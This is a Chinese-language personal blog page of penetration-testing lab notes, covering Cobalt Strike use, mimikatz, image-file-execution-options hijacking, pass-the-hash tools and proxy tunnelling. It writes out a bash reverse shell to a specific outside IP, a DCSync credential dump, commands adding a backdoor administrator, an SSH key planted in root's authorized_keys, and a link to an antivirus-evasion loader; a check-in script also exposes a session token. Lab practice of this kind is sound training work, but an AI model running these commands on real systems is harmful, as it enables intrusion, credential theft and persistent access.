打靶笔记
  • 春秋云境——Tsclient
  • 思考flag2中除了传cs马进程注入,有无其他方式(RDP?)
  • cs常见命令用法
  • 修改注册表映像劫持有哪些利用方式
  • 哈希传递登录的不同方式(不同工具的区别、利用前提,不同操作系统如何哈希传递)
  1. mimikatz+sharptoken/msf

另外应该cs注入svchost守护进程,才会自启动cs shell,其他进程注入后不会自启动

  1. Cs 有。。命令吗(°ー°〃)暂时先只记shell connect,用到哪些再加

4.劫持改为粘滞键,notepad,calc等触发cmd

默认是只有管理员和local system有权读写修改。

IFEO实际上是Windows的一项正常功能,主要用于调试程序,其初衷是在程序启动的时候开启调试器来调试程序,这样一来可以在调试器中观察程序在难以重现的环境中的行为。例如,某个程序在随用户登录自动启动时会出错,但在登录后手动启动时却一切正常,这就可以通过IFEO设置一个调试器,无论程序何时启动,都会开启这个调试器对其进行调试,以便找出问题。

win+R输入regedit以管理员身份运行打开注册表编辑器,并找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options就是保存IFEO设置的地方

5.impacket的smbexec/wmiexec,crackmapexec,msf的exploit/windows/smb/psexec

额外看了cs不出网横向

话说cs能直接配置代理转发,不用上gost了

不出网正向连接需要用beacon TCP listener,然后生成的exe上线后在1的shell里用connect去连接

1
connect 10.10.10.2 2222

java代审sink插件https://github.com/SpringKill-team/CodeAuditAssistant

打开是空白的话需要授权,授权完需要重启idea

其他的问题

cs server挂在vps,记得vps开放50050端口

image-20250822174139381

cs用这个shell免杀比较新https://github.com/D13Xian/CobaltStrike-KunKun

image-20250822192818100

因为要jdk>=11,用这个切环境变量很爽https://github.com/zhangqi-ulua/JavaEnvironmentVariablesManager/releases/tag/1.0

打靶快捷

vps 117.72.74.197

花生壳 115.236.153.174

bash -i >& /dev/tcp/115.236.153.170/28998 0>&1

mimikatz dump密码:mimikatz.exe “lsadump::dcsync /domain:xiaorang.lab /all /csv” exit

bloodhound自己的zip有自己的SharpHound,最后连续收集两次拖进去(信息全一点

本地adminstrators 用SharpHound抓不到,nt system才能抓到,可以甜土豆提权提到system

gost 代理

gost -L socks5://:5555?bind=true

gost -L rtcp://:2222/172.22.13.28:22 -F socks5://172.22.13.28:5555

windows添加管理员用户

net user godown qwerQ!1234 /add

net localgroup administrators godown /add

(work win qwerq!1234)

python转交互式shell

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

写ssh目录

1
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAgEAyMKDIbTdKecWjhOxfm/C6bkR8WuABeqUAacyD8DJGfA7UaKQbvIZxagSrQ7X+jOPJYDwoe3HKoG0uH987EmsHMS1FLYgHIrGzinvta4AlMFCS3r8OF/49iGvcZnqxD5UNd9DRBlu4jIu6FDl+lYyebFDfjCoRn2hcin8oxXNLbo1X95B6xqaokrnFz9H57GzrqfwN6lVy46ophmtmcLqlIIMByt2wxEdaVFWrxHYVNmvMUfHOg9KJ+aqKmPIbLLSSknAeW7YOB1o86wq36vUv5nYQqol1mAlCtYYSJrNd2RRN43ikRqbQb4l5h1S1GJmYQ8hMJWhlia19waYGiSutKBjpVggEKS00Btku5xwStOraCOJqDiSNTQw//XjL/0oCeZtsrCLmPblgeLg1i7QBrTif3jQ+3UNC1DWj7+NXdmaEAeLWH1vVu7K0JzN3yMKM9ywoZQClGVv6F+aHS5HwxjKdCQPy86eG+rSmOy+RgpYjX4leqg3sb2a4Ys9oNt7/bQChABxnGfi8l48Su+nQhW1orks9sdZM9qhem90fkpqFDxt1pv6Q8J8C+8kIjXg/FmZ4qp8+d8InDqhhNbDLdAkQX1o9Iocg2XHSAtDNUHUZtNCT2AcmAH61qGkOHAe6dvXEVA9HRxF5oElnyAQ87z4Hbo2wW7CCPBbXNkjQIk= rsa 4096-20250810" >> /root/.ssh/authorized_keys

proxychains4

sudo vi /etc/proxychains4.conf

socks5 192.168.1.100 1080

clash开TUN代理上google很丝滑

image-20250829102509956

vim清空::%d

windows nc 要用 nc64 -lvp 19998

其他记录

云镜自动签到脚本,token储存在本地浏览器(什么cookie hh?),只要在浏览器不点退出登录,token就能一直使用,写个计划任务每天上午下午签到顺便刷新token的有效期

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/bin/bash

echo "正在使用 token 进行签到..."
sign_in_response=$(curl -i 'https://apicloud.ichunqiu.com/student/user/sign_in' \
  -X POST \
  -H 'Host: apicloud.ichunqiu.com' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0' \
  -H 'Accept: application/json, text/plain, */*' \
  -H 'Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' \
  -H 'Accept-Encoding: gzip, deflate, br' \
  -H 'Content-Type: application/json' \
  -H 'Sign: 28af30d38da5cb0511528a321ff80c3d22f9469e' \
  -H 'Origin: https://yunjing.ichunqiu.com' \
  -H 'Referer: https://yunjing.ichunqiu.com/' \
  -H 'Connection: keep-alive' \
  --data-raw "{\"stamp\":xxxx,\"token\":\"s:17e8158d3d3b3e355a94f1c927beeebc\",\"rs\":\"afff5c3e21619d27731d39fe5c03256f\"}" \
  --compressed)

echo "签到响应: $sign_in_response"

# 写日志
{
  echo "====== $(date) ======"
  echo "获取 token 时间戳: $current_timestamp"
  echo "获取 token 响应: $token_response"
  echo "签到时间戳: $new_timestamp"
  echo "签到响应: $sign_in_response"
  echo "====================="
  echo ""
} >> /var/log/send_request.log

msf笔记

先Nmap或者arp-scan扫端口,根据端口攻击。如果开了web端口,就想办法rce反弹shell。拿到shell后扫一下内网,目前只会ping扫,或者升msf,用msf的scan exp扫。然后在靶机上download venom客户端用以代理,在攻击机起服务端,socks通道打通后,更改proxychains4.conf(配置文件,名字可能不一样),实现攻击机的全局代理,然后带上Proxychains nmap扫内网靶机端口

如果靶机打着无回显了,应该是靶机命令还没执行完,比如ping扫内网,命令还没执行完,在shell退了sessions,或者单纯的用ctrl+c,在靶机上命令是还会继续执行的,就导致了后续命令执行不了。这种情况再杀掉session重新打时,之前在靶机上的shell还在,就会发生如下情况:

1
2
[-] Command shell session 3 is not valid and will be closed
[*] 192.168.137.129 - Command shell session 3 closed.

可以把靶机重启,但是要重复许多步骤,最好不要杀掉sessions,进入之前没执行完命令的sessions,然后发送远程ctrl+c

渗透笔记
上一篇:
lilctf 2025
下一篇:
春秋云镜 Tsclient

    • Copyright © 2020 - 2025 godownio | Powered by Hexo | Theme Bamboo

    本站总访问量: |